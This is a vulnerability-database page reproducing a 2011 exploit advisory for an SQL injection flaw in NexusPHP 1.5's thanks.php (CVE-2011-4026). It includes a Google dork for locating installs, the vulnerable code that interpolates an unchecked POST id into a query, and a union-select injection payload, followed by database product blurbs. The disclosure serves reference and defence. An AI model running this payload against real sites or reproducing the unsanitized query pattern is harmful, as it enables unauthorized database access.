| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| NexusPHP v1.5 SQL Injection | 7 Oct 201100:00 | – | zdt | |
| CVE-2011-4026 | 21 Oct 201118:00 | – | cve | |
| CVE-2011-4026 | 21 Oct 201118:00 | – | cvelist | |
| EUVD-2011-3979 | 7 Oct 202500:30 | – | euvd | |
| NexusPHP 1.5 - SQL Injection | 8 Oct 201100:00 | – | exploitpack | |
| CVE-2011-4026 | 21 Oct 201118:55 | – | nvd | |
| NexusPHP 1.5 SQL Injection | 9 Oct 201100:00 | – | packetstorm | |
| Sql injection | 21 Oct 201118:55 | – | prion | |
| NexusPHP 1.5 - SQL Injection | 1 Jul 201400:00 | – | seebug |
# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026
Nexusphp is BitTorrent private tracker scripts written in PHP
The codes is here http://sourceforge.net/projects/nexusphp/
There is a sql injectiong Vulnerability in thanks.php.
-----------------------vul code-------------------
//thanks.php
if ($_GET['id'])
stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
$_POST["id"] is not checked, lead a sql injection Vulnerability
-----------------------exploit-------------------
_POST[id] : -1 union select version()>4/*
-----------------------exploit end -------------------Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation